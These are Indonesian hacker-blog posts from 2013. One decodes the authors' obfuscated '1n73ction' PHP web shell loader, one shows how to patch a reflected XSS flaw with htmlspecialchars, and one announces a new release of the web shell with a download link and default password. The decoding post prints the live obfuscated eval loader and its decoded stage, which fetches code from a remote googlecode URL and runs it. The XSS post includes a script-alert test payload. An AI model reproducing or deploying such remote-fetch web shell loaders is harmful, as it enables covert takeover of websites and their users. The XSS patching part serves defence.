: :

Navbar Bawah

Sabtu, 13 Juli 2013

Decode 1n73ction shell v3.1

encode ini diciptakan oleh sahabat saya mr.gandrunx

langsung saja kita lihat sourch encode shell saya di versi 3.1

<?php
function x($inject){eval("\$z=gz" "inf" "la" "te(s" "t" "r_r" "ot" "13(ba" "se" "6" "4" "_" "d" "e" "c" "o" "de(st" "r" "_" "r" "o" "t" "13(" "gzi" "nf" "lat" "e(" "bas" "e6" "4_d" "ec" "ode(\$inject))))));eval(\$z);");}x("BcHJEkMwAADQD3LQytgOPVmiDEFJIzdaS5Wxpglf3/dcDFDc4D595B+2qTZJTnH07osgbhwsgWs1pusqOlxq5nXn7zyH60hZbh5oDxFcTr+XsqdFkE0gr/avRyMnNOL69LyM1k5gqBddGaeBLVOX1RXWI+yzhoh5AW0deFNnicYBg6BlYVV4D9oB/dDJB1R0bWYawJK1QHZniQPlvtn49gc=");?>

 yups langsung kita decode

1. hapus tanda "." untuk mengetahui alur decodenya

sehingga menjadi:

eval("\$z=gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode(\$inject​))))));eval(\$z);");

nah kita sudah tau alurnya sekarang tinggal modifnya

2. modif script di atas menjadi

<?php
$decode="BcHJEkMwAADQD3LQytgOPVmiDEFJIzdaS5Wxpglf3/dcDFDc4D595B+2qTZJTnH07osgbhwsgWs1pusqOlxq5nXn7zyH60hZbh5oDxFcTr+XsqdFkE0gr/avRyMnNOL69LyM1k5gqBddGaeBLVOX1RXWI+yzhoh5AW0deFNnicYBg6BlYVV4D9oB/dDJB1R0bWYawJK1QHZniQPlvtn49gc=";
$decode=gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($decode))))));

echo "<textarea cols=100 row=70 >$decode</textarea>";
?> 

 save dengan extensi php lalu buaka di localhost atau yang lain
setelah itu akan keluar hasilnya seperti berikut:

$in73ct = "http://injects.googlecode.com/files/sssss.txt"; 
$inj3ct = file_get_contents($in73ct); 
eval(gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($inj3ct)))) ​))); 

3. kita decode lagi agar kelihatan scriptnya dan kita jadikan file baru 

<?php
$in73ct = "http://injects.googlecode.com/files/sssss.txt";
$inj3ct = gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($in73ct)))) ​)); 
file_put_contents("decode.php",$inj3ct);
?> 

save dengan extensi php 
lalu buka jika filenya blank berarti kita berhasil decode untuk melihat hasilnya buka file "decode.php" 

sekian tutorial dari kami

salam kami


X'1N73CT & S1T1B4RC0D3
 
  
Read More --►

Jumat, 12 Juli 2013

Patching bug xss


Sebenarnya XSS termasuk bug yang gawat  namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.

bug XSS juga pernah di hargai 6juta yang terdapat di web mail terkenal yakni yahoo
menelisik ke belakan di tahun 2009 saya pernah membaca tutorial yang memanfaatkan bug ini
tepatnya: http://www.ilmuhacking.com/web-security/menjaring-password-di-klikbca-dengan-xss/comment-page-1/

ok sekarang saya coba berbagi tutorial patching bug XSS ini
 tapi kita tidak memakai web untuk di jadikan target tapi kita buat file untuk mempraktekkan nya lewat localhost

pertama setelah kita install atau jalankan program xampp atau appserv
lalu kita buat
file php dengan script berikut:
<?php
echo'<br><br><center><form method="post">
<input type="text" name="tes" size="50" /><input type="submit" name="test2" value="Search" /></form><br><br><br>';

if(isset( $_POST['test2'])){
$test=$_POST['tes'];
echo "kata yang ada cari adalah: $test ";}
?>

nah save dengan extensi php lalu jalankan
setelah itu kita masukan tester XSS yakni "><script>alert('tester by x-1n73ct')</script>
kemudian enter maka hasilnya akan keluar alert "tester by x-1n73ct"
nah ini bisa disimpulkan vuln XSS
bug ini terjadi ketika sebuah perintah yang tidak disaring oleh input
pada kasus ini perintah yang di ambil dari input test tidak disaring melainkan langsung ditampilkan dengan perintah echo
jadi cara patch nya yakni dengan menyaring nya denagn perintah htmlspecialchars() di dalam script tadi
sehingga perintah tadi menjadi

<?php
echo'<br><br><center><form method="post">
<input type="text" name="tes" size="50" /><input type="submit" name="test2" value="Search" /></form><br><br><br>';

if(isset( $_POST['test2'])){
$test=$_POST['tes'];
$test=htmlspecialchars($test);
echo "kata yang ada cari adalah: $test ";}
?>
 lalu masukan perintah tester tadi
dan silahkan lihat hasilnya ^_^

sekian dari saya

x'1n73ct


Read More --►

Kamis, 11 Juli 2013

1n73ction v3.3 [ Release ]

[ 1n73ction v3.3 releaase ]


Fitures: full fitures
download: http://code.google.com/ 
or
download  Disini
shell default password: 1n73ction

note:
salam dari kami X'1N73CT & S1T1 B4RC0DE
 
Read More --►

welcome

welcome
Read More --►